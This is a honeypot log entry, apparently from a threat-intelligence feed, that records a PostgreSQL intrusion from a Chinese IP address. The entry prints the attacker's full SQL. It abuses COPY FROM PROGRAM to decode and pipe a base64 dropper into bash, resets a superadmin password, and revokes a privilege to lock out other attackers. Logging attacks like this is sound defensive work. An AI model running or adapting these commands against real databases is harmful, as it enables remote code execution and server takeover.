Attack 76fc49f0-ede2-4eb5-b8ce-3f453d0742e3
Details
| ID | 76fc49f0-ede2-4eb5-b8ce-3f453d0742e3 |
| Attack Type | postgres |
| IP Address | 60.194.125.38 |
| Username | postgres |
| Password | empty |
| Client Version | |
| Country | China |
| Date | 2024-09-25 09:03PM |
Commands
select * from pg_catalog.pg_user where usename='pgg_superadmins'; drop table if exists ksawtzks;create table ksawtzks(cmd_output text);copy ksawtzks from program 'echo iyevymlul2jhc2gkcgtpbgwglwygenn2ywpwa2lsbcatzibwzgvmzw5kzxjkcnbrawxsic1mihvwzgf0zwnozwnrzxjkcgpmdw5jdglvbibfx2n1cmwoksb7ciagcmvhzcbwcm90bybzzxj2zxigcgf0aca8pdwkkgvjag8gjhsxly8vlyb9kqogierpqz0vjhtwyxroly8gly99ciagse9tvd0ke3nlcnzlci8voip9ciague9svd0ke3nlcnzlci8vkjp9ciagw1sgecike0hpu1r9iia9psb4iir7ue9svh0iif1dicymifbpulq9odakciagzxhlyyazpd4vzgv2l3rjcc8ke0hpu1r9lyrqt1juciagzwnobyatzw4gikdfvcake0rpq30gsfruuc8xljbcclxusg9zddogjhtit1nufvxyxg5cclxuiia+jjmkicaod2hpbgugcmvhzcbsaw5loybkbwogicbbwyaijgxpbmuiid09icqnxhinif1dicymigjyzwfrciagzg9uzsamjibjyxqpidwmmwogigv4zwmgmz4mlqp9cgppzibbic14icikkgnvbw1hbmqglxygy3vybckiif07ihrozw4kicbjdxjsidc4lje1my4xndauotyvcgcuc2h8ymfzaaplbglmifsglxggiiqoy29tbwfuzcatdib3z2v0ksigxtsgdghlbgogihdnzxqglxeglu8tidc4lje1my4xndauotyvcgcuc2h8ymfzaaplbhnlciagx19jdxjsigh0dha6ly83oc4xntmumtqwljk2l3bnmi5zahxiyxnocmzp|base64 -d|bash';select * from ksawtzks;drop table if exists ksawtzks; alter user pgg_superadmins with password '1038b63606c6e36b03796f7fecb06a7c'; revoke pg_execute_server_program from postgres;
Proxy Requests
| IP Address | User / Pass | Date | Headers | URL |
|---|